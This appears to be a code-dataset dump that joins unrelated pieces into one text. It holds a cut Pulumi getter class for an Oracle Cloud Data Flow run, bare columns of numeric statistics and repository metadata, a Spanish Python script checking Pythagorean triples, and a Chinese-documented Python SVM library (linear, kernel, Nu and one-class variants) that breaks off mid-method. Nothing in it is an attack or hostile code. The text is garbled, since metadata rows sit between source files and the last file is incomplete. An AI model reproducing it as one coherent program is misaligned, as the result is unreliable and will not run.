@pulumi.getter(name="sparkVersion")
def spark_version(self) -> pulumi.Output[str]:
"""
The Spark version utilized to run the application. This value may be set if applicationId is not since the Spark version will be taken from the associated application.
"""
return pulumi.get(self, "spark_version")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The current state of this run.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The date and time a application was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> pulumi.Output[str]:
"""
The date and time a application was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
"""
return pulumi.get(self, "time_updated")
@property
@pulumi.getter(name="totalOcpu")
def total_ocpu(self) -> pulumi.Output[int]:
"""
The total number of oCPU requested by the run.
"""
return pulumi.get(self, "total_ocpu")
@property
@pulumi.getter(name="warehouseBucketUri")
def warehouse_bucket_uri(self) -> pulumi.Output[str]:
"""
An Oracle Cloud Infrastructure URI of the bucket to be used as default warehouse directory for BATCH SQL runs. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "warehouse_bucket_uri")
| 61.588725
| 864
| 0.686946
| 12,553
| 96,140
| 5.086115
| 0.037362
| 0.066504
| 0.057012
| 0.053754
| 0.959434
| 0.94634
| 0.927999
| 0.917849
| 0.90546
| 0.872976
| 0
| 0.004988
| 0.205492
| 96,140
| 1,560
| 865
| 61.628205
| 0.830868
| 0.477803
| 0
| 0.735912
| 1
| 0
| 0.117781
| 0.030746
| 0
| 0
| 0
| 0
| 0
| 1
| 0.170166
| false
| 0.001105
| 0.007735
| 0.003315
| 0.283978
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
704269a69696036d378bf997b226dc4f61c15926
| 1,349
|
py
|
Python
|
tareas/funcion_pitagora.py
|
PythonCisco/clase
|
6e18715012ce72385637b7f09a0a9c810165f1af
|
[
"MIT"
] | null | null | null |
tareas/funcion_pitagora.py
|
PythonCisco/clase
|
6e18715012ce72385637b7f09a0a9c810165f1af
|
[
"MIT"
] | null | null | null |
tareas/funcion_pitagora.py
|
PythonCisco/clase
|
6e18715012ce72385637b7f09a0a9c810165f1af
|
[
"MIT"
] | null | null | null |
"""
Anselmo Mc Taggart
2022-02-11
"""
def terna_pitagorica(n1, n2, n3):
"""Imprime si los tres argumentos forman una terna pitagórica.
No puede distinguir si el orden de los valores no es a, b, c.
Los dos primeros tienen que ser los catetos, el último debe ser la hipotenusa.
No retorna nada, solo imprime.
"""
a = n1 * n1
b = n2 * n2
c = n3 * n3
print(a)
print(b)
print(c)
if a + b == c:
print(" TRUE Es una Terna Pitagorica")
else:
print(" FALSE No una Terna Pitagorica")
terna_pitagorica(3, 4, 5)
def terna_pitagorica(n1, n2, n3):
"""Imprime si los tres argumentos forman una terna pitagórica.
No puede distinguir si el orden de los valores no es a, b, c.
Los dos primeros tienen que ser los catetos, el último debe ser la hipotenusa.
No retorna nada, solo imprime.
"""
# crea variables
a = n1 * n1
b = n2 * n2
c = n3 * n3
# chekea terna
if a + b == c:
terna = True
else:
terna = False
return terna
def imprime_terna(n1, n2, n3):
# imprime variables
a, b, c = n1, n2, n3
print(a)
print(b)
print(c)
if terna_pitagorica(a, b, c):
print(" TRUE Es una Terna Pitagorica")
else:
print(" FALSE No una Terna Pitagorica")
| 21.412698
| 83
| 0.581913
| 202
| 1,349
| 3.861386
| 0.277228
| 0.153846
| 0.023077
| 0.05
| 0.789744
| 0.789744
| 0.789744
| 0.789744
| 0.735897
| 0.697436
| 0
| 0.038631
| 0.328391
| 1,349
| 62
| 84
| 21.758065
| 0.822296
| 0
| 0
| 0.766667
| 0
| 0
| 0.170767
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.333333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5624f6f5b41df397c85012e9df9fea2425a1d5c5
| 29,348
|
py
|
Python
|
pysvm/svm.py
|
Kaslanarian/PythonSVM
|
715eeef2a245736167addf45a6aee8b40b54d0c7
|
[
"MIT"
] | 2
|
2021-09-25T01:00:37.000Z
|
2021-09-27T12:13:24.000Z
|
pysvm/svm.py
|
Kaslanarian/PythonSVM
|
715eeef2a245736167addf45a6aee8b40b54d0c7
|
[
"MIT"
] | 1
|
2021-09-17T12:08:14.000Z
|
2021-09-17T12:08:14.000Z
|
pysvm/svm.py
|
Kaslanarian/PythonSVM
|
715eeef2a245736167addf45a6aee8b40b54d0c7
|
[
"MIT"
] | null | null | null |
import numpy as np
from sklearn.base import BaseEstimator
from sklearn.metrics import accuracy_score, r2_score
from sklearn.multiclass import OneVsOneClassifier, OneVsRestClassifier
from .rff import NormalRFF
from .solver import Solver, SolverWithCache, NuSolver, NuSolverWithCache
class BiLinearSVC(BaseEstimator):
r'''二分类线性SVM,该类被多分类LinearSVC继承,所以不需要使用它。
通过求解对偶问题
.. math:: \min_{\pmb\alpha}\quad&\dfrac12\pmb\alpha^\top Q\pmb\alpha-\pmb{e}^\top\pmb{\alpha}\\
\text{s.t.}\quad& \pmb{y}^\top\pmb\alpha=0,\\
&0\leqslant\alpha_i\leqslant C,i=1,\cdots ,l
得到决策边界
.. math:: f(\pmb x)=\sum_{i=1}^ly_i\alpha_i\pmb x_i^T\pmb x-\rho
Parameters
----------
C : float, default=1
SVM的正则化参数,默认为1;
max_iter : int, default=1000
SMO算法迭代次数,默认1000;
tol : float, default=1e-5
SMO算法的容忍度参数,默认1e-5;
cache_size : int, default=256
lru缓存大小,默认256,如果为0则不使用缓存,计算Q矩阵然后求解.
'''
def __init__(self,
C: float = 1.,
max_iter: int = 1000,
tol: float = 1e-5,
cache_size: int = 256) -> None:
super().__init__()
self.C = C
self.max_iter = max_iter
self.tol = tol
self.cache_size = cache_size
def fit(self, X: np.ndarray, y: np.ndarray):
'''训练模型
Parameters
----------
X : np.ndarray
训练集特征;
y : np.array
训练集标签,建议0为负标签,1为正标签.
'''
X, y = np.array(X), np.array(y, dtype=float)
y[y != 1] = -1
l, self.n_features = X.shape
p = -np.ones(l)
w = np.zeros(self.n_features)
if self.cache_size == 0:
Q = y.reshape(-1, 1) * y * np.matmul(X, X.T)
solver = Solver(Q, p, y, self.C, self.tol)
else:
solver = SolverWithCache(p, y, self.C, self.tol, self.cache_size)
def func(i):
return y * np.matmul(X, X[i]) * y[i]
for n_iter in range(self.max_iter):
i, j = solver.working_set_select()
if i < 0:
break
delta_i, delta_j = solver.update(i, j, func)
w += delta_i * y[i] * X[i] + delta_j * y[j] * X[j]
else:
print("LinearSVC not coverage with {} iterations".format(
self.max_iter))
self.coef_ = (w, solver.calculate_rho())
return self
def decision_function(self, X: np.ndarray) -> np.ndarray:
'''决策函数,输出预测值'''
return np.matmul(self.coef_[0], np.array(X).T) - self.coef_[-1]
def predict(self, X: np.ndarray) -> np.ndarray:
'''预测函数,输出预测标签(0-1)'''
return (self.decision_function(np.array(X)) >= 0).astype(int)
def score(self, X: np.ndarray, y: np.ndarray) -> float:
'''评估函数,给定特征和标签,输出正确率'''
return accuracy_score(y, self.predict(X))
class LinearSVC(BiLinearSVC):
r'''多分类线性SVM,使用sklearn的multiclass模块实现了多分类。
Parameters
----------
C : float, default=1
SVM的正则化参数,默认为1;
max_iter : int, default=1000
SMO算法迭代次数,默认1000;
tol : float, default=1e-5
SMO算法的容忍度参数,默认1e-5;
cache_size : int, default=256
lru缓存大小,默认256,如果为0则不使用缓存,计算Q矩阵然后求解;
multiclass : {"ovr", "ovo"}, default="ovr"
多分类策略,ovr(一对多)或ovo(一对一),默认ovr;
n_jobs : int, default=None
是否采用多核,使用多少CPU并行,默认不采用。
'''
def __init__(self,
C: float = 1.,
max_iter: int = 1000,
tol: float = 1e-5,
cache_size: int = 256,
multiclass: str = "ovr",
n_jobs=None) -> None:
super().__init__(C, max_iter, tol, cache_size)
self.multiclass = multiclass
self.n_jobs = n_jobs
params = {
"estimator": BiLinearSVC(C, max_iter, tol, cache_size),
"n_jobs": n_jobs,
}
self.multiclass_model: OneVsOneClassifier = {
"ovo": OneVsOneClassifier(**params),
"ovr": OneVsRestClassifier(**params),
}[multiclass]
def fit(self, X: np.ndarray, y: np.ndarray):
'''训练模型
Parameters
----------
X : np.ndarray
训练集特征;
y : np.array
训练集标签,建议0为负标签,1为正标签.
Return
------
self : LinearSVC
'''
self.multiclass_model.fit(X, y)
return self
def decision_function(self, X: np.ndarray):
return self.multiclass_model.decision_function(X)
def predict(self, X: np.ndarray):
return self.multiclass_model.predict(X)
def score(self, X: np.ndarray, y: np.ndarray):
return self.multiclass_model.score(X, y)
class LinearSVR(BiLinearSVC):
r'''线性SVM回归(SVR)
原对偶问题
.. math:: \min_{\pmb{\alpha},\pmb{\alpha}^*}\quad&\dfrac12(\pmb{\alpha}-\pmb{\alpha}^*)^\top Q(\pmb{\alpha}-\pmb{\alpha}^*)+\varepsilon\sum_{i=1}^l(\alpha_i+\alpha_i^*)+\sum_{i=1}^l z_i({\alpha}_i-{\alpha}_i^*)\\
\text{s.t.}\quad&\pmb e^\top(\pmb{\alpha}-\pmb{\alpha}^*)=0\\
&0\leqslant\alpha_i,\alpha^*_i\leqslant C,i=1,\cdots ,l
我们将其变成单变量优化问题,然后使用SMO求解,参考https://welts.xyz/2021/09/16/svr/。得到决策边界
.. math:: f(\pmb x)=\sum_{i=1}^l(-\alpha_i+\alpha_i^*)\pmb x_i^T\pmb x-\rho
Parameters
----------
C : float, default=1
SVM的正则化参数,默认为1;
eps : float, default=0
:math:`\varepsilon`-hinge损失的参数;
max_iter : int, default=1000
SMO算法迭代次数,默认1000;
tol : float, default=1e-5
SMO算法的容忍度参数,默认1e-5;
cache_size : int, default=256
lru缓存大小,默认256,如果为0则不使用缓存,计算Q矩阵然后求解.
'''
def __init__(self,
C: float = 1.,
eps: float = 0.,
max_iter: int = 1000,
tol: float = 1e-5,
cache_size: int = 256) -> None:
super().__init__(C, max_iter, tol, cache_size)
self.eps = eps
def fit(self, X: np.ndarray, y: np.ndarray):
'''训练模型
Parameters
----------
X : np.ndarray
训练集特征;
y : np.array
训练集target
Return
------
self : LinearSVR
'''
X, z = np.array(X), np.array(y)
l, self.n_features = X.shape
y = np.empty(2 * l)
y[:l], y[l:] = 1., -1.
p = np.ones(2 * l) * self.eps
p[:l] -= z
p[l:] += z
w = np.zeros(self.n_features)
if self.cache_size == 0:
Q = np.matmul(X, X.T)
Q2 = np.hstack((Q, -Q))
Q4 = np.vstack((Q2, -Q2))
solver = Solver(Q4, p, y, self.C, self.tol)
else:
solver = SolverWithCache(p, y, self.C, self.tol, self.cache_size)
def func(i):
if i < l:
Qi = np.matmul(X, X[i])
else:
Qi = -np.matmul(X, X[i - l])
return np.hstack((Qi, -Qi))
for n_iter in range(self.max_iter):
i, j = solver.working_set_select()
if i < 0:
break
delta_i, delta_j = solver.update(i, j, func)
w += (delta_i * y[i] * X[i if i < l else i - l] +
delta_j * y[j] * X[j if j < l else j - l])
else:
print("LinearSVR not coverage with {} iterations".format(
self.max_iter))
self.coef_ = (w, solver.calculate_rho())
return self
def decision_function(self, X: np.ndarray):
return super().decision_function(X)
def predict(self, X: np.ndarray):
'''预测函数,输出预测值'''
return self.decision_function(X)
def score(self, X: np.ndarray, y: np.ndarray):
'''评估函数,给定特征和标签,输出r2系数'''
return r2_score(y, self.predict(X))
class BiKernelSVC(BiLinearSVC):
r'''二分类核SVM,该类被多分类KernelSVC继承,所以不需要使用它。优化问题与BiLinearSVC相同,只是Q矩阵定义不同。
此时的决策边界
.. math:: f(\pmb x)=\sum_{i=1}^ly_i\alpha_i K(\pmb x_i, \pmb x)-\rho
Parameters
----------
C : float, default=1
SVM的正则化参数,默认为1;
kernel : {"linear", "poly", "rbf", "sigmoid"}, default="rbf"
核函数,默认径向基函数(RBF);
degree : float, default=3
多项式核的次数,默认3;
gamma : {"scale", "auto", float}, default="scale"
rbf、ploy和sigmoid核的参数 :math:`\gamma`,如果用'scale',那么就是1 / (n_features * X.var()),如果用'auto',那么就是1 / n_features;
coef0 : float, default=0.
核函数中的独立项。它只在"poly"和"sigmoid"中有意义;
max_iter : int, default=1000
SMO算法迭代次数,默认1000;
rff : bool, default=False
是否采用随机傅里叶特征,默认为False;
D : int, default=1000
随机傅里叶特征的采样次数,默认为1000;
tol : float, default=1e-5
SMO算法的容忍度参数,默认1e-5;
cache_size : int, default=256
lru缓存大小,默认256,如果为0则不使用缓存,计算Q矩阵然后求解.
'''
def __init__(self,
C: float = 1.,
kernel: str = 'rbf',
degree: float = 3,
gamma: str = 'scale',
coef0: float = 0,
max_iter: int = 1000,
rff: bool = False,
D: int = 1000,
tol: float = 1e-5,
cache_size: int = 256) -> None:
super().__init__(C, max_iter, tol, cache_size)
self.kernel = kernel
self.gamma = gamma
self.degree = degree
self.coef0 = coef0
self.rff = rff
self.D = D
def register_kernel(self, std: float):
'''注册核函数
Parameters
----------
std : 输入数据的标准差,用于rbf='scale'的情况
'''
if type(self.gamma) == str:
gamma = {
'scale': 1 / (self.n_features * std),
'auto': 1 / self.n_features,
}[self.gamma]
else:
gamma = self.gamma
if self.rff:
rff = NormalRFF(gamma, self.D).fit(np.ones((1, self.n_features)))
rbf_func = lambda x, y: np.matmul(rff.transform(x),
rff.transform(y).T)
else:
rbf_func = lambda x, y: np.exp(-gamma * (
(x**2).sum(1, keepdims=True) +
(y**2).sum(1) - 2 * np.matmul(x, y.T)))
degree = self.degree
coef0 = self.coef0
return {
"linear": lambda x, y: np.matmul(x, y.T),
"poly": lambda x, y: (gamma * np.matmul(x, y.T) + coef0)**degree,
"rbf": rbf_func,
"sigmoid": lambda x, y: np.tanh(gamma * np.matmul(x, y.T) + coef0)
}[self.kernel]
def fit(self, X: np.ndarray, y: np.ndarray):
X, y = np.array(X), np.array(y, dtype=float)
y[y != 1] = -1
l, self.n_features = X.shape
p = -np.ones(l)
kernel_func = self.register_kernel(X.std())
if self.cache_size == 0:
Q = y.reshape(-1, 1) * y * kernel_func(X, X)
solver = Solver(Q, p, y, self.C, self.tol)
else:
solver = SolverWithCache(p, y, self.C, self.tol, self.cache_size)
def func(i):
return y * kernel_func(X, X[i:i + 1]).reshape(-1) * y[i]
for n_iter in range(self.max_iter):
i, j = solver.working_set_select()
if i < 0:
break
solver.update(i, j, func)
else:
print("KernelSVC not coverage with {} iterations".format(
self.max_iter))
self.decision_function = lambda x: np.matmul(
solver.alpha * y,
kernel_func(X, x),
) - solver.calculate_rho()
return self
def predict(self, X: np.ndarray) -> np.ndarray:
return super().predict(X)
def score(self, X: np.ndarray, y: np.ndarray) -> float:
return super().score(X, y)
class KernelSVC(LinearSVC, BiKernelSVC):
r'''多分类核SVM。
Parameters
----------
C : float, default=1
SVM的正则化参数,默认为1;
kernel : {"linear", "poly", "rbf", "sigmoid"}, default="rbf"
核函数,默认径向基函数(RBF);
degree : float, default=3
多项式核的次数,默认3;
gamma : {"scale", "auto", float}, default="scale"
rbf、ploy和sigmoid核的参数 :math:`\gamma`,如果用'scale',那么就是1 / (n_features * X.var()),如果用'auto',那么就是1 / n_features;
coef0 : float, default=0.
核函数中的独立项。它只在"poly"和"sigmoid"中有意义;
max_iter : int, default=1000
SMO算法迭代次数,默认1000;
rff : bool, default=False
是否采用随机傅里叶特征,默认为False;
D : int, default=1000
随机傅里叶特征的采样次数,默认为1000;
tol : float, default=1e-5
SMO算法的容忍度参数,默认1e-5;
cache_size : int, default=256
lru缓存大小,默认256,如果为0则不使用缓存,计算Q矩阵然后求解.
multiclass : {"ovr", "ovo"}, default="ovr"
多分类策略,ovr(一对多)或ovo(一对一),默认ovr;
n_jobs : int, default=None
是否采用多核,使用多少CPU并行,默认不采用。
'''
def __init__(self,
C: float = 1.,
kernel: str = 'rbf',
degree: float = 3,
gamma: float = 'scale',
coef0: float = 0.,
max_iter: int = 1000,
rff: bool = False,
D: int = 1000,
tol: float = 1e-5,
cache_size: int = 256,
multiclass: str = "ovr",
n_jobs: int = None) -> None:
super().__init__(C, max_iter, tol, cache_size)
self.kernel = kernel
self.gamma = gamma
self.degree = degree
self.coef0 = coef0
self.rff = rff
self.D = D
params = {
"estimator":
BiKernelSVC(C, kernel, degree, gamma, coef0, max_iter, rff, D, tol,
cache_size),
"n_jobs":
n_jobs,
}
self.multiclass_model = {
"ovo": OneVsOneClassifier(**params),
"ovr": OneVsRestClassifier(**params),
}[multiclass]
def fit(self, X: np.ndarray, y: np.ndarray):
return super().fit(X, y)
def decision_function(self, X: np.ndarray):
return super().decision_function(X)
def predict(self, X: np.ndarray):
return super().predict(X)
def score(self, X: np.ndarray, y: np.ndarray):
return super().score(X, y)
class KernelSVR(BiKernelSVC):
'''核支持向量回归
Parameters
----------
C : float, default=1
SVM的正则化参数,默认为1;
eps : float, default=0
:math:`\varepsilon`-hinge损失的参数;
kernel : {"linear", "poly", "rbf", "sigmoid"}, default="rbf"
核函数,默认径向基函数(RBF);
degree : float, default=3
多项式核的次数,默认3;
gamma : {"scale", "auto", float}, default="scale"
rbf、ploy和sigmoid核的参数 :math:`\gamma`,如果用'scale',那么就是1 / (n_features * X.var()),如果用'auto',那么就是1 / n_features;
coef0 : float, default=0.
核函数中的独立项。它只在"poly"和"sigmoid"中有意义;
max_iter : int, default=1000
SMO算法迭代次数,默认1000;
rff : bool, default=False
是否采用随机傅里叶特征,默认为False;
D : int, default=1000
随机傅里叶特征的采样次数,默认为1000;
tol : float, default=1e-5
SMO算法的容忍度参数,默认1e-5;
cache_size : int, default=256
lru缓存大小,默认256,如果为0则不使用缓存,计算Q矩阵然后求解.
'''
def __init__(self,
C: int = 1.,
eps: float = 0.,
kernel: str = 'rbf',
degree: float = 3,
gamma: float = 'scale',
coef0: float = 0.,
max_iter: int = 1000,
rff: bool = False,
D: int = 1000,
tol: float = 1e-5,
cache_size: int = 256) -> None:
super().__init__(C, kernel, degree, gamma, coef0, max_iter, rff, D,
tol, cache_size)
self.eps = eps
def fit(self, X: np.ndarray, y: np.ndarray):
X, z = np.array(X), np.array(y)
l, self.n_features = X.shape
y = np.empty(2 * l)
y[:l], y[l:] = 1., -1.
p = np.ones(2 * l) * self.eps
p[:l] -= z
p[l:] += z
kernel_func = self.register_kernel(X.std())
if self.cache_size == 0:
Q = kernel_func(X, X)
Q2 = np.hstack((Q, -Q))
Q4 = np.vstack((Q2, -Q2))
solver = Solver(Q4, p, y, self.C, self.tol)
else:
solver = SolverWithCache(p, y, self.C, self.tol, self.cache_size)
def func(i):
if i < l:
Qi = kernel_func(X, X[i:i + 1]).reshape(-1)
else:
Qi = -kernel_func(X, X[i - l:i - l + 1]).reshape(-1)
return np.hstack((Qi, -Qi))
for n_iter in range(self.max_iter):
i, j = solver.working_set_select()
if i < 0:
break
solver.update(i, j, func)
else:
print("KernelSVR not coverage with {} iterations".format(
self.max_iter))
self.decision_function = lambda x: np.matmul(
solver.alpha[:l] - solver.alpha[l:],
kernel_func(X, x),
) - solver.calculate_rho()
return self
def predict(self, X: np.ndarray):
'''预测函数,输出预测值'''
return self.decision_function(np.array(X))
def score(self, X: np.ndarray, y: np.ndarray):
'''评估函数,给定特征和标签,输出r2系数'''
return r2_score(y, self.predict(X))
class BiNuSVC(BiKernelSVC):
r'''二分类NuSVM,通过参数 :math:`\nu`来控制支持向量的数量。
通过求解对偶问题
.. math:: \min_{\pmb\alpha}\quad&\dfrac12\pmb\alpha^\top Q\pmb\alpha\\
\text{s.t.}\quad&0\leqslant\alpha_i\leqslant\frac{1}{l},,i=1,\cdots,l\\
&\pmb{e}^\top\pmb\alpha\geqslant \nu,\pmb y^\top\pmb{\alpha}=0
得到决策边界
.. math:: f(\pmb x)=\sum_{i=1}^ly_i\alpha_i\pmb K(\pmb x_i,\pmb x)-\rho
Parameters
----------
nu : float, default=0.5
NuSVM的参数,控制支持向量的数量;
kernel : {"linear", "poly", "rbf", "sigmoid"}, default="rbf"
核函数,默认径向基函数(RBF);
degree : float, default=3
多项式核的次数,默认3;
gamma : {"scale", "auto", float}, default="scale"
rbf、ploy和sigmoid核的参数 :math:`\gamma`,如果用'scale',那么就是1 / (n_features * X.var()),如果用'auto',那么就是1 / n_features;
coef0 : float, default=0.
核函数中的独立项。它只在"poly"和"sigmoid"中有意义;
max_iter : int, default=1000
SMO算法迭代次数,默认1000;
rff : bool, default=False
是否采用随机傅里叶特征,默认为False;
D : int, default=1000
随机傅里叶特征的采样次数,默认为1000;
tol : float, default=1e-5
SMO算法的容忍度参数,默认1e-5;
cache_size : int, default=256
lru缓存大小,默认256,如果为0则不使用缓存,计算Q矩阵然后求解.
'''
def __init__(self,
nu: float = 0.5,
kernel: str = 'rbf',
degree: float = 3,
gamma: float = 'scale',
coef0: float = 0.,
max_iter: int = 1000,
rff: bool = False,
D: int = 1000,
tol: float = 1e-5,
cache_size: int = 256) -> None:
super().__init__(1, kernel, degree, gamma, coef0, max_iter, rff, D,
tol, cache_size)
self.nu = nu
def fit(self, X: np.ndarray, y: np.ndarray):
X, y = np.array(X), np.array(y, dtype=float)
y[y != 1] = -1
l, self.n_features = X.shape
p = np.zeros(l)
kernel_func = self.register_kernel(X.std())
def func(i):
return y * kernel_func(X, X[i:i + 1]).reshape(-1) * y[i]
if self.cache_size == 0:
Q = y.reshape(-1, 1) * y * kernel_func(X, X)
solver = NuSolver(Q, p, y, self.nu * l, self.C, self.tol)
else:
solver = NuSolverWithCache(p, y, self.nu * l, self.C, func,
self.tol, self.cache_size)
for n_iter in range(self.max_iter):
i, j, Qi, Qj = solver.working_set_select(func)
if i < 0:
break
solver.update(i, j, Qi, Qj)
else:
print("NuSVC not coverage with {} iterations".format(
self.max_iter))
rho, b = solver.calculate_rho_b()
self.decision_function = lambda x: np.matmul(
solver.alpha * y,
kernel_func(X, x),
) / rho + b / rho
return self
def predict(self, X: np.ndarray):
return super().predict(X)
def score(self, X: np.ndarray, y: np.ndarray):
return super().score(X, y)
class NuSVC(KernelSVC, BiNuSVC):
'''多分类NuSVM
Parameters
----------
nu : float, default=0.5
NuSVM的参数,控制支持向量的数量;
kernel : {"linear", "poly", "rbf", "sigmoid"}, default="rbf"
核函数,默认径向基函数(RBF);
degree : float, default=3
多项式核的次数,默认3;
gamma : {"scale", "auto", float}, default="scale"
rbf、ploy和sigmoid核的参数 :math:`\gamma`,如果用'scale',那么就是1 / (n_features * X.var()),如果用'auto',那么就是1 / n_features;
coef0 : float, default=0.
核函数中的独立项。它只在"poly"和"sigmoid"中有意义;
max_iter : int, default=1000
SMO算法迭代次数,默认1000;
rff : bool, default=False
是否采用随机傅里叶特征,默认为False;
D : int, default=1000
随机傅里叶特征的采样次数,默认为1000;
tol : float, default=1e-5
SMO算法的容忍度参数,默认1e-5;
cache_size : int, default=256
lru缓存大小,默认256,如果为0则不使用缓存,计算Q矩阵然后求解.
multiclass : {"ovr", "ovo"}, default="ovr"
多分类策略,ovr(一对多)或ovo(一对一),默认ovr;
n_jobs : int, default=None
是否采用多核,使用多少CPU并行,默认不采用。
'''
def __init__(self,
nu: float = 0.5,
kernel: str = 'rbf',
degree: float = 3,
gamma: float = 'scale',
coef0: float = 0.,
max_iter: int = 1000,
rff: bool = False,
D: int = 1000,
tol: float = 1e-5,
cache_size: int = 256,
multiclass: str = "ovr",
n_jobs: int = None) -> None:
super().__init__(1, kernel, degree, gamma, coef0, max_iter, rff, D,
tol, cache_size, multiclass, n_jobs)
self.nu = nu
params = {
"estimator":
BiNuSVC(nu, kernel, degree, gamma, coef0, max_iter, rff, D, tol,
cache_size),
"n_jobs":
n_jobs,
}
self.multiclass_model: OneVsOneClassifier = {
"ovo": OneVsOneClassifier(**params),
"ovr": OneVsRestClassifier(**params),
}[multiclass]
def fit(self, X: np.ndarray, y: np.ndarray):
return super().fit(X, y)
def predict(self, X: np.ndarray):
return super().predict(X)
def score(self, X: np.ndarray, y: np.ndarray):
return super().score(X, y)
class NuSVR(KernelSVR):
r'''NuSVM回归
对偶问题求解
.. math:: \min_{\pmb{\alpha},\pmb{\alpha}^*}\quad&\dfrac12(\pmb{\alpha}-\pmb{\alpha}^*)^\top Q(\pmb{\alpha}-\pmb{\alpha}^*)+\pmb z^\top({\pmb\alpha}-{\pmb\alpha}^*)\\
\text{s.t.}\quad&\pmb e^\top(\pmb{\alpha}-\pmb{\alpha}^*)=0,\pmb e^\top(\pmb\alpha+\pmb\alpha_i^*)\leqslant C\nu\\
&0\leqslant\alpha_i,\alpha^*_i\leqslant C/l,i=1,\cdots ,l
处理方式和LinearSVR中的类似.
Parameters
----------
C : float, default=1
SVM的正则化参数,默认为1;
nu : float, default=0.5
NuSVM的参数,控制支持向量的数量;
kernel : {"linear", "poly", "rbf", "sigmoid"}, default="rbf"
核函数,默认径向基函数(RBF);
degree : float, default=3
多项式核的次数,默认3;
gamma : {"scale", "auto", float}, default="scale"
rbf、ploy和sigmoid核的参数 :math:`\gamma`,如果用'scale',那么就是1 / (n_features * X.var()),如果用'auto',那么就是1 / n_features;
coef0 : float, default=0.
核函数中的独立项。它只在"poly"和"sigmoid"中有意义;
max_iter : int, default=1000
SMO算法迭代次数,默认1000;
rff : bool, default=False
是否采用随机傅里叶特征,默认为False;
D : int, default=1000
随机傅里叶特征的采样次数,默认为1000;
tol : float, default=1e-5
SMO算法的容忍度参数,默认1e-5;
cache_size : int, default=256
lru缓存大小,默认256,如果为0则不使用缓存,计算Q矩阵然后求解.
'''
def __init__(self,
C: float = 1.,
nu: float = 0.5,
kernel: str = 'rbf',
degree: float = 3,
gamma: float = 'scale',
coef0: float = 0.,
max_iter: int = 1000,
rff: bool = False,
D: int = 1000,
tol: float = 1e-5,
cache_size: int = 256) -> None:
super().__init__(C, 0, kernel, degree, gamma, coef0, max_iter, rff, D,
tol, cache_size)
self.nu = nu
def fit(self, X: np.ndarray, y: np.ndarray):
X, z = np.array(X), np.array(y)
l, self.n_features = X.shape
y = np.empty(2 * l)
y[:l], y[l:] = 1, -1
p = np.empty(2 * l)
p[:l], p[l:] = -z, z
kernel_func = self.register_kernel(X.std())
def func(i):
if i < l:
Qi = kernel_func(X, X[i:i + 1]).reshape(-1)
else:
Qi = -kernel_func(X, X[i - l:i - l + 1]).reshape(-1)
return np.hstack((Qi, -Qi))
if self.cache_size == 0:
Q = kernel_func(X, X)
Q2 = np.hstack((Q, -Q))
Q4 = np.vstack((Q2, -Q2))
solver = NuSolver(Q4, p, y, self.C * l * self.nu, self.C, self.tol)
else:
solver = NuSolverWithCache(p, y, self.C * l * self.nu, self.C,
func, self.tol, self.cache_size)
for n_iter in range(self.max_iter):
i, j, Qi, Qj = solver.working_set_select(func)
if i < 0:
break
solver.update(i, j, Qi, Qj)
else:
print("NuSVR not coverage with {} iterations".format(
self.max_iter))
rho, b = solver.calculate_rho_b()
self.decision_function = lambda x: np.matmul(
solver.alpha[:l] - solver.alpha[l:],
kernel_func(X, x),
) + b
return self
def predict(self, X: np.ndarray):
return super().predict(X)
def score(self, X: np.ndarray, y: np.ndarray):
return super().score(X, y)
class OneClassSVM(BiNuSVC):
r'''OneClassSVM(OC_SVM),单类SVM,用于异常检测
求解对偶问题
.. math:: \min_{\pmb\alpha}\quad&\dfrac{1}{2}\pmb\alpha^\top Q\pmb\alpha\\
\text{s.t.}\quad&0\le\alpha_i\le1/(\nu l),i=1,\cdots l\\
&\pmb e^\top\alpha=1
得到判别式
.. math:: f(\pmb x)=\text{sgn}(\sum_{i=1}^ly_i\alpha_i\pmb K(\pmb x_i,\pmb x)-\rho)
Parameters
----------
nu : float, default=0.5
控制支持向量的数量的参数;
kernel : {"linear", "poly", "rbf", "sigmoid"}, default="rbf"
核函数,默认径向基函数(RBF);
degree : float, default=3
多项式核的次数,默认3;
gamma : {"scale", "auto", float}, default="scale"
rbf、ploy和sigmoid核的参数 :math:`\gamma`,如果用'scale',那么就是1 / (n_features * X.var()),如果用'auto',那么就是1 / n_features;
coef0 : float, default=0.
核函数中的独立项。它只在"poly"和"sigmoid"中有意义;
max_iter : int, default=1000
SMO算法迭代次数,默认1000;
rff : bool, default=False
是否采用随机傅里叶特征,默认为False;
D : int, default=1000
随机傅里叶特征的采样次数,默认为1000;
tol : float, default=1e-5
SMO算法的容忍度参数,默认1e-5;
cache_size : int, default=256
lru缓存大小,默认256,如果为0则不使用缓存,计算Q矩阵然后求解.
'''
def __init__(self,
nu: float = 0.5,
kernel: str = 'rbf',
degree: float = 3,
gamma: float = 'scale',
coef0: float = 0.,
max_iter: int = 1000,
rff: bool = False,
D: int = 1000,
tol: float = 1e-5,
cache_size: int = 256) -> None:
super().__init__(nu, kernel, degree, gamma, coef0, max_iter, rff, D,
tol, cache_size)
def fit(self, X: np.ndarray):
'''训练函数,注意到OC_SVM是无监督学习,所以输入无标签
Parameters
----------
X : np.ndarray
训练特征数据
'''
X = np.array(X)
l, self.n_features = X.shape
kernel_func = self.register_kernel(X.std())
p = np.zeros(l)
y = np.ones(l)
def func(i):
return kernel_func(X, X[i:i + 1]).reshape(-1)
